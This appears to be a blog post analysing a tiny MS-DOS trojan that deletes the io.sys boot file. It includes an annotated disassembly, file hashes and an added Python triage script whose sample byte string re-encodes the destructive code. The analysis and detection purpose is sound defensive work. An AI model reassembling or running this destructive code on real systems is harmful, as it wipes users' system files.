This morning, among the usual spam, I received a little attachment that contains an old virus, so I dissected it:
seg000:0100 mov ax, 4301h ; AH=43h / AL=01h: set file attributes
seg000:0103 mov dx, 114h ; DS:DX -> ASCIZ file name (the io.sys path, stored after the code)
seg000:0106 mov cx, 6 ; new attributes = hidden (02h) | system (04h); read-only (01h) is cleared
seg000:0109 int 21h ; DOS - 2+ - SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113 ; CF set on error: give up
seg000:010D mov ah, 41h ; AH=41h: delete file, DX still points at the same name
seg000:010F int 21h ; DOS - 2+ - DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2 ; jumps to the next instruction either way: a no-op
seg000:0113 retn
seg000:0113 start endp
The file is a little COM executable for MS-DOS that makes two elementary interrupt calls: one to set file attributes and another to delete a file (the ASCIZ pathname at DS:DX points to the io.sys system file in this case). The attribute call comes first because INT 21h/41h refuses to unlink a read-only file: rewriting the attributes as hidden+system drops the read-only bit, and the delete then succeeds.
This malware is identified by the major antivirus vendors as Trojan.DOS.DelIosys.b
File Size: 30 Bytes
MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f
SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835
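The two DOS calls above, as an added triage script (Python, not code from the blog): it decodes the handful of opcodes the sample uses, tracks AX/CX/DX, and reports each INT 21h file call with the path it targets. The 20 code bytes are re-encoded from the listing's addresses; the ASCIZ path at 0114h is a constructed placeholder, since the post does not show those bytes.

```python
# Added example (not the blog's code): static triage of a tiny COM sample.
# Opcode bytes are re-encoded from the listing; the path at 0114h is a placeholder.
ORG = 0x100  # COM programs load at CS:0100h, so file offset = address - ORG

# Constructed sample: the code bytes match the listing's addresses exactly.
SAMPLE = bytes.fromhex(
    "B80143" "BA1401" "B90600" "CD21" "7206"   # 0100-010C
    "B441" "CD21" "7200" "C3"                  # 010D-0113
) + b"IO.SYS\0" + b"\0" * 3                    # 0114-011D (placeholder string)

ATTR_BITS = {0x01: "read-only", 0x02: "hidden", 0x04: "system",
             0x08: "volume", 0x10: "directory", 0x20: "archive"}

def asciz(buf, addr):
    """Read the NUL-terminated string DS:DX points at (DS == CS in a COM)."""
    off = addr - ORG
    return buf[off:buf.index(b"\0", off)].decode("ascii", "replace")

def triage(buf):
    """Walk the straight-line code, tracking AX/CX/DX, and record every
    INT 21h file call. Returns a list of (function, path[, attrs]) tuples."""
    regs = {"ax": 0, "cx": 0, "dx": 0}
    events, pc = [], 0
    while pc < len(buf):
        op = buf[pc]
        if op in (0xB8, 0xB9, 0xBA):                    # mov ax/cx/dx, imm16
            reg = {0xB8: "ax", 0xB9: "cx", 0xBA: "dx"}[op]
            regs[reg] = int.from_bytes(buf[pc + 1:pc + 3], "little")
            pc += 3
        elif op == 0xB4:                                # mov ah, imm8
            regs["ax"] = (buf[pc + 1] << 8) | (regs["ax"] & 0xFF)
            pc += 2
        elif op == 0xCD and buf[pc + 1] == 0x21:        # int 21h
            ah, al = regs["ax"] >> 8, regs["ax"] & 0xFF
            if ah == 0x43 and al == 0x01:               # set file attributes
                attrs = [n for b, n in ATTR_BITS.items() if regs["cx"] & b]
                events.append(("set_attributes", asciz(buf, regs["dx"]), attrs))
            elif ah == 0x41:                            # delete file (unlink)
                events.append(("delete_file", asciz(buf, regs["dx"])))
            pc += 2
        elif op == 0x72:        # jb rel8: error branch; assume the call succeeded
            pc += 2
        elif op == 0xC3:                                # retn ends the program
            break
        else:
            raise ValueError(f"unhandled opcode {op:02X} at {ORG + pc:04X}")
    return events

def strips_readonly_then_deletes(events):
    """Flag the io.sys pattern: attributes rewritten without read-only, then
    an unlink of the same path (INT 21h/41h fails on read-only files)."""
    cleared = {e[1] for e in events if e[0] == "set_attributes" and "read-only" not in e[2]}
    return any(e[0] == "delete_file" and e[1] in cleared for e in events)
```

Running `triage(SAMPLE)` on the constructed bytes yields the attribute change to hidden+system followed by the unlink of the same path, which `strips_readonly_then_deletes` flags.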
It's incredible how old viruses are still circulating on the web!
See you at the next post 🙂